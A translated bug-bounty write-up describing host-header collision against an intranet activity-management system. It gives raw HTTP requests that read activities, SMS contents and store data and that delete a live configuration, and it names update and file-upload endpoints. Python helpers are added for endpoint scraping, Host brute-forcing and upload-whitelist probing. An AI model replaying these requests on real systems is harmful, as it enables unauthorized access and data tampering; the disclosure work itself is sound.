Bug Hunting Notes: Medium- and High-Risk Vulnerabilities Obtained via Host Collision

0X01. Preface

    The target of this test was a private program on a domestic SRC platform. Host collision was used to reach the API of an intranet system; by constructing requests to the interfaces it exposes, sensitive information could be read and modified, and a constructed upload interface allowed arbitrary files to be uploaded. The result was one high-risk and one medium-risk finding. The principle of host collision and the tools for it were introduced in earlier posts, so they are not repeated here; readers can refer back to those. This one is a little harder than last time, but still manageable.

0X02. Mining and utilization process

First, look at a JS file of the system; it references a large number of interfaces. Searching the file directly for URL paths turns up many of them.
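An added example, not code from the original post, of the JS review step done as a script: it pulls API-looking paths out of a front-end bundle, including paths assembled from a base constant (BASE+"/x" or `${BASE}/x`), which a plain search for URLs misses. The JavaScript sample is constructed for the example; only the endpoint paths in it are the ones this post names.

```python
import re

# Constructed sample of the kind of front-end bundle the post refers to. It is
# made up for this example: the endpoint paths are the ones named in the post,
# the surrounding JavaScript is invented.
SAMPLE_JS = r"""
var BASE="/activity_admin/api";
function listActivities(p){return axios.post(BASE+"/activities/ics",p)}
function listShops(p){return axios.post("/activity_admin/api/activities/ebusiness/condition",p)}
function delConfig(d){return axios.delete("/activity_admin/api/source/config/base/delete",{data:d})}
var smsUrl = '/activity_admin/api/sms/tasks';
var logo = "/static/img/logo.png"; var css="/static/app.css";
fetch(`${BASE}/activities/pushNotice/condition`, {method:"POST"});
"""

# var/let/const NAME = "/path"   -> base-path constants worth remembering
CONST_RE = re.compile(r'''\b(?:var|let|const)\s+(\w+)\s*=\s*["'](/[^"'\s]+)["']''')
# NAME + "/fragment"             -> string concatenation onto a constant
CONCAT_RE = re.compile(r'''\b(\w+)\s*\+\s*["'](/[^"'\s]+)["']''')
# `${NAME}/fragment`             -> template literal onto a constant
TEMPLATE_RE = re.compile(r'''`\$\{(\w+)\}(/[^`\s]+)`''')
# any quoted absolute path
LITERAL_RE = re.compile(r'''["'`](/[^"'`\s]+)["'`]''')

# Static assets are noise when the goal is API discovery.
STATIC_EXT = (".png", ".jpg", ".jpeg", ".gif", ".svg", ".ico",
              ".css", ".js", ".woff", ".woff2", ".ttf")


def _is_api_path(path, api_hint):
    return api_hint in path and not path.lower().endswith(STATIC_EXT)


def extract_endpoints(js, api_hint="/api/"):
    """Return the sorted, de-duplicated API paths referenced in a JS bundle.

    Paths built as BASE+"/x" or `${BASE}/x` are resolved through constants
    declared in the same bundle; fragments whose base is unknown are dropped.
    """
    bindings = {name: value for name, value in CONST_RE.findall(js)}
    found = set()
    for name, frag in CONCAT_RE.findall(js) + TEMPLATE_RE.findall(js):
        if name in bindings:
            found.add(bindings[name] + frag)
    for path in LITERAL_RE.findall(js):
        found.add(path)
    return sorted(p for p in found if _is_api_path(p, api_hint))


if __name__ == "__main__":
    for endpoint in extract_endpoints(SAMPLE_JS):
        print(endpoint)
```

Run it over the bundles pulled from the target; the `api_hint` default fits the /activity_admin/api layout here and should be changed for systems that use a different prefix.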

Access the system with a constructed URL, capture the request in Burp, change the Host header value to the collided hostname, and replay the following packet in Repeater (note: there is a high probability that a 403 is returned; send it a few more times and the desired data comes back). The response lists some of the activities in the system, such as activity time and name. That by itself is not much, so to demonstrate impact I tried deleting some useless activity information (coordinated with the vendor, who wanted me to prove the harm; readers should think carefully before operating on data). The deletion example, using the /activity_admin/api/source/config/base/delete interface, follows further below; first, the request that lists the activities:

```http
POST /activity_admin/api/activities/ics HTTP/1.1
Host: xxx.com.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/json
Content-Length: 2

{}
```
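An added example, not code from the original post, that automates the Burp step above: send the same request to the target IP with each candidate Host value, resend a few times before giving up on a name, and keep the names that are not answered with 403. A small local HTTP server stands in for the vendor's front-end; its behaviour (403 for unknown Hosts, and a 403 on every other send even for the right Host, one way a load-balanced front-end can look) is an assumption made to reproduce what the post describes, as is the hostname activity-admin.internal.

```python
import http.client
import json
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from itertools import count

# Constructed stand-in for the front-end that routes on the Host header. It is
# made up for this example and mimics what the post describes: an unknown Host
# gets 403, and even the right Host is refused on some sends (here: every
# other one), so a single 403 is not a negative result.
KNOWN_VHOST = "activity-admin.internal"   # assumed intranet hostname, not from the post
_known_host_hits = count()


class VhostHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        self.rfile.read(int(self.headers.get("Content-Length", 0)))
        host = self.headers.get("Host", "").split(":")[0]
        if host == KNOWN_VHOST and next(_known_host_hits) % 2 == 1:
            body = json.dumps({"code": 0, "data": [{"name": "demo activity"}]}).encode()
            self.send_response(200)
        else:
            body = b"Forbidden"
            self.send_response(403)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_fake_front_end():
    srv = ThreadingHTTPServer(("127.0.0.1", 0), VhostHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe(ip, port, host, path, body=b"{}", retries=3):
    """Send one request with a forged Host header, up to `retries` times.

    Returns (status, body) of the first non-403 answer, otherwise the last
    403. This is the post's "send it a few more times" step, automated.
    """
    last = None
    for _ in range(retries):
        conn = http.client.HTTPConnection(ip, port, timeout=5)
        conn.request("POST", path, body=body, headers={
            "Host": host,                      # the collided vhost, not the IP
            "Content-Type": "application/json",
            "Content-Length": str(len(body)),
        })
        resp = conn.getresponse()
        last = (resp.status, resp.read())
        conn.close()
        if last[0] != 403:
            return last
    return last


def collide(ip, port, candidates, path="/activity_admin/api/activities/ics"):
    """Try each candidate Host against one IP; keep those not answered with 403."""
    hits = {}
    for host in candidates:
        status, data = probe(ip, port, host, path)
        if status != 403:
            hits[host] = (status, len(data))
    return hits


def demo():
    """Run the collision against the constructed front-end; returns the hits."""
    srv = start_fake_front_end()
    try:
        ip, port = srv.server_address
        candidates = ["www.example.test", "oa.example.test",
                      KNOWN_VHOST, "mail.example.test"]
        return collide(ip, port, candidates)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for host, (status, size) in demo().items():
        print(f"{host}: {status} ({size} bytes)")
```

The status code is only the first filter: before trusting a hit, compare its response length and title against a baseline sent with a random Host, and tune `retries` to how often the front-end refuses the correct name.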

Continue looking for interfaces that can be used, for example /activity_admin/api/sms/tasks, which shows the content of SMS messages.

There are also interfaces such as /activity_admin/api/source/config/base/condition, which lists the configuration of the various mini-programs in the system. Before the deletion there are 51 records:

```http
POST /activity_admin/api/source/config/base/condition HTTP/1.1
Host: xxx.com.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 27

{"pageNum":1,"pageSize":51}
```

Then the delete interface /activity_admin/api/source/config/base/delete is used to remove the car page calculator configuration (sourceCode seriesCalc); the system returns success and the configuration is gone:

```http
DELETE /activity_admin/api/source/config/base/delete HTTP/1.1
Host: xxx.com.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 70

{"sourceCode":"seriesCalc","operatorName":"songziwen","operatorId":-1}
```

This interface lists all store activities, including the store name and the name of the user who created each activity:

```http
POST /activity_admin/api/activities/ebusiness/condition HTTP/1.1
Host: xxxx.com.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 28

{"pageNum":1,"pageSize":380}
```

Then there is a high-risk interface that can modify activities: for example, a 100,000-yuan coupon could be repriced to 0.1 yuan, which is extremely harmful. Since the system is live, it was not tampered with; the request format follows the delete interface above. The interfaces concerned:

/activity_admin/api/activities/ebusiness/update

/activity_admin/api/activities/pushNotice/condition

At this point the information obtained and the operations possible already reach high-risk level, so I stopped looking there and turned to the file upload interface, which was likewise constructed by guessing. It turned out to have no whitelist restriction. In my experience many internal systems have no restriction on file uploads at all (I have run into this at least 10 times), so readers should always try to construct the upload interface. Here it also gave a working arbitrary file upload vulnerability.
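An added example, not from the original post, of probing a guessed upload interface for an extension whitelist: a harmless text file goes first as the baseline, then names with script extensions, and the probe reports which ones the server keeps. The upload field name `file`, the acceptance rule (HTTP 200 with a JSON `code` of 0), the candidate list and the stand-in backend are all assumptions made for the example; point `send` at a function that issues the real request (with the collided Host header) to use it against a target.

```python
import json
import os
import re
import secrets

# Probe files: a harmless baseline first, then names a whitelist must reject.
# The list is constructed for this example; extend it for the stack under test.
CANDIDATES = [
    ("probe.txt", "text/plain"),
    ("probe.jsp", "application/octet-stream"),
    ("probe.php", "application/octet-stream"),
    ("probe.html", "text/html"),
    ("probe.jsp.txt", "text/plain"),
]
MARKER = b"upload-probe-marker-0001"  # benign body, nothing executable


def build_multipart(field, filename, content_type, data):
    """Build one multipart/form-data request (headers, body) with a single file part."""
    boundary = "----probe" + secrets.token_hex(8)
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    body = head + data + f"\r\n--{boundary}--\r\n".encode()
    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
    }
    return headers, body


def accepted_by_json_code(status, text):
    """Assumed success rule: admin APIs that answer 200 with {"code":0,...}."""
    if status != 200:
        return False
    try:
        return json.loads(text).get("code") == 0
    except ValueError:
        return False


def probe_upload(send, field="file", accepted=accepted_by_json_code):
    """send(headers, body) -> (status, text). Returns the filenames the server kept."""
    kept = []
    for filename, ctype in CANDIDATES:
        headers, body = build_multipart(field, filename, ctype, MARKER)
        status, text = send(headers, body)
        if accepted(status, text):
            kept.append(filename)
    return kept


def fake_upload_backend(whitelist=None):
    """Constructed stand-in for the upload interface. whitelist=None means no
    extension check at all, which is the situation the post describes."""
    def send(headers, body):
        boundary = headers["Content-Type"].split("boundary=")[1]
        if boundary.encode() not in body:
            return 400, '{"code":400,"msg":"bad multipart"}'
        m = re.search(rb'filename="([^"]+)"', body)
        name = m.group(1).decode() if m else ""
        ext = os.path.splitext(name)[1].lower()
        if whitelist is None or ext in whitelist:
            return 200, json.dumps({"code": 0, "url": f"/upload/{secrets.token_hex(4)}{ext}"})
        return 200, json.dumps({"code": 1, "msg": "file type not allowed"})
    return send


if __name__ == "__main__":
    print("no whitelist :", probe_upload(fake_upload_backend()))
    print("txt only     :", probe_upload(fake_upload_backend({".txt"})))
```

Keep the probe body harmless, as above, and stop at the first script extension the server keeps; the returned URL is what goes into the report, not a shell.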

0X03. Summary

   This hunt yielded one high-risk and one medium-risk finding, for a total of 25,000 in rewards. It was a little more tiring than the last one, but fine. When readers run into a case like this, try to construct the more threatening interfaces and raise the impact as far as possible, but add and delete operations need to be cleared with the vendor first, or you may find yourself in trouble.


Original post: blog.csdn.net/weixin_52501704/article/details/129326709